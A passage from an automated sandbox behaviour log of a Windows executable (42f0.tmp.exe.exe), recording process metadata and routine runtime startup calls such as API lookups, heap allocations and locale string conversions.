# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 05.10.2020 17:41:48.282 Process: id = "1" image_name = "42f0.tmp.exe.exe" filename = "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe" page_root = "0x186ec000" os_pid = "0x110c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x11cc [0069.822] GetStartupInfoW (in: lpStartupInfo=0x146fafc | out: lpStartupInfo=0x146fafc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0069.823] GetProcessHeap () returned 0x1780000 [0069.920] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0069.920] GetProcAddress (hModule=0x772d0000, lpProcName="FlsAlloc") returned 0x772e4ae0 [0069.920] GetProcAddress (hModule=0x772d0000, lpProcName="FlsFree") returned 0x772e4b00 [0069.921] GetProcAddress (hModule=0x772d0000, lpProcName="FlsGetValue") returned 0x772e4b20 [0069.921] GetProcAddress (hModule=0x772d0000, lpProcName="FlsSetValue") returned 0x772e4b40 [0069.921] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7733ebc0 [0069.921] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventExW") returned 0x7733eb20 [0069.921] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSemaphoreExW") returned 0x7733eb80 [0069.921] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadStackGuarantee") returned 0x772e6700 [0069.921] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolTimer") returned 0x772e6d30 [0069.922] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolTimer") returned 0x779bd7c0 [0069.922] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bb840 [0069.922] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolTimer") returned 0x779bb740 [0069.922] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolWait") returned 0x772e6d70 [0069.922] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolWait") returned 0x779bc0b0 [0069.922] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolWait") returned 0x779bbe10 [0069.922] GetProcAddress (hModule=0x772d0000, lpProcName="FlushProcessWriteBuffers") returned 0x779e2b20 [0069.923] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779d8e50 [0069.923] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessorNumber") returned 0x779d52f0 [0069.923] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalProcessorInformation") returned 0x772e71b0 [0069.923] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSymbolicLinkW") returned 0x772e4510 [0069.923] GetProcAddress (hModule=0x772d0000, lpProcName="SetDefaultDllDirectories") returned 0x74d2d900 [0069.923] GetProcAddress (hModule=0x772d0000, lpProcName="EnumSystemLocalesEx") returned 0x772e49a0 [0069.923] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringEx") returned 0x772e7050 [0069.923] GetProcAddress (hModule=0x772d0000, lpProcName="GetDateFormatEx") returned 0x772e7760 [0069.924] GetProcAddress (hModule=0x772d0000, lpProcName="GetLocaleInfoEx") returned 0x772e7190 [0069.924] GetProcAddress (hModule=0x772d0000, lpProcName="GetTimeFormatEx") returned 0x772e7780 [0069.924] GetProcAddress (hModule=0x772d0000, lpProcName="GetUserDefaultLocaleName") returned 0x772e72c0 [0069.924] GetProcAddress (hModule=0x772d0000, lpProcName="IsValidLocaleName") returned 0x772e7440 [0069.924] GetProcAddress (hModule=0x772d0000, lpProcName="LCMapStringEx") returned 0x772e7480 [0069.924] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentPackageId") returned 0x74cbe260 [0069.924] GetProcAddress (hModule=0x772d0000, lpProcName="GetTickCount64") returned 0x772e0db0 [0069.925] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0069.925] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0069.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x3bc) returned 0x179b678 [0069.925] GetCurrentThreadId () returned 0x11cc [0069.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x17970c8 [0069.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x800) returned 0x179ba40 [0069.926] GetStartupInfoW (in: lpStartupInfo=0x146facc | out: lpStartupInfo=0x146facc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0069.926] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0069.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0069.926] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0069.926] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe\" " [0069.926] GetEnvironmentStringsW () returned 0x179c248* [0069.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xaca) returned 0x179cd20 [0069.926] FreeEnvironmentStringsW (penv=0x179c248) returned 1 [0069.926] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x354ba8, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe")) returned 0x28 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5a) returned 0x17842e0 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x94) returned 0x1790470 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x3e) returned 0x178bd90 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x50) returned 0x1783fe8 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x6e) returned 0x1787ba8 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x78) returned 0x178d198 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x62) returned 0x1783af0 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x28) returned 0x1793b08 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x48) returned 0x1793618 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x1a) returned 0x179afc0 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x2e) returned 0x178b968 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x56) returned 0x178aca0 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x2a) returned 0x178b9a0 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x2e) returned 0x178b540 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x44) returned 0x17937a8 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x1c) returned 0x179b038 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x182) returned 0x17907c8 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x7c) returned 0x178bce0 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x36) returned 0x1798318 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x3a) returned 0x178c2a0 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x90) returned 0x1789668 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x24) returned 0x1793c28 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x30) returned 0x178b3b8 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x36) returned 0x1797f98 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x48) returned 0x1793898 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x52) returned 0x178a9c8 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x3c) returned 0x178bf40 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0xd6) returned 0x178bb90 [0069.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x2e) returned 0x178b428 [0069.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x1e) returned 0x179b2e0 [0069.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x2c) returned 0x178b930 [0069.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x50) returned 0x17847c8 [0069.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x4e) returned 0x1784648 [0069.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x24) returned 0x1793c58 [0069.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x42) returned 0x1793528 [0069.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x20) returned 0x179af98 [0069.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x38) returned 0x1797fd8 [0069.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x24) returned 0x1793b68 [0069.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x179cd20 | out: hHeap=0x1780000) returned 1 [0069.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x80) returned 0x1782dd8 [0069.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x8, Size=0x800) returned 0x179c248 [0069.929] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0069.929] GetLastError () returned 0x0 [0069.929] SetLastError (dwErrCode=0x0) [0069.929] GetLastError () returned 0x0 [0069.929] SetLastError (dwErrCode=0x0) [0069.929] GetLastError () returned 0x0 [0069.929] SetLastError (dwErrCode=0x0) [0069.929] GetACP () returned 0x4e4 [0069.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x220) returned 0x179ca50 [0069.929] GetLastError () returned 0x0 [0069.929] SetLastError (dwErrCode=0x0) [0069.929] IsValidCodePage (CodePage=0x4e4) returned 1 [0069.929] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x146fac0 | out: lpCPInfo=0x146fac0) returned 1 [0069.929] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x146f588 | out: lpCPInfo=0x146f588) returned 1 [0069.929] GetLastError () returned 0x0 [0069.930] SetLastError (dwErrCode=0x0) [0069.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x146f99c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x146f99c, cbMultiByte=256, lpWideCharStr=0x146f308, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ娥,Ā") returned 256 [0069.930] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ娥,Ā", cchSrc=256, lpCharType=0x146f59c | out: lpCharType=0x146f59c) returned 1 [0069.930] GetLastError () returned 0x0 [0069.930] SetLastError (dwErrCode=0x0) [0069.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x146f99c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x146f99c, cbMultiByte=256, lpWideCharStr=0x146f2d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā") returned 256 [0069.930] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0069.930] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x146f0c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0069.930] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x146f89c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÝ\x8bÆ·ØúF\x01g\x9a+", lpUsedDefaultChar=0x0) returned 256 [0069.930] GetLastError () returned 0x0 [0069.930] SetLastError (dwErrCode=0x0) [0069.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x146f99c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x146f99c, cbMultiByte=256, lpWideCharStr=0x146f2f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0069.930] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0069.930] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x146f0e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0069.930] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x146f79c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f 